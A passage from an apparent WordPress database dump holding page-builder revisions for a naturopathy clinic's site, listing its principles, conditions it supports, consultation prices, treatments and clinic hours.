style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2022-10-21 13:04:57','2022-10-21 05:04:57','',27,'https://verdenaturopathy.com.au/?p=386',0,'revision','',0),(385,1,'2022-10-21 13:03:24','2022-10-21 05:03:24','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support health in many conditions, including:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep, emotional imbalance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction (insulin resistance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions (hyper/hypothyroidism)</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance)</span></span><br /><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>skin health (acne, eczema/dermatitis, rosacea)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>cardiovascular health (chronic inflammation, high cholesterol)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health (prostate issues, sexual health)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health (poor immunity, digestive issues, behavioural issues)</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span>We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (75 min) - $140\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><br /><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $50\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.<span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_4\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" title_text=\"5-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][et_pb_blurb title=\"Flower essence consult (30 min) - $75\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A consult devoted to your emotional wellbeing. Flower essences are a form of energetic medicine used to assist with working through negative beliefs, stress or trauma. Flower essences are gentle and supportive in nature making them perfect for children too. Consult includes a 25ml customised essence. </span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><br /><br /></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2022-10-21 13:03:24','2022-10-21 05:03:24','',28,'https://verdenaturopathy.com.au/?p=385',0,'revision','',0),(389,1,'2022-10-21 13:11:34','2022-10-21 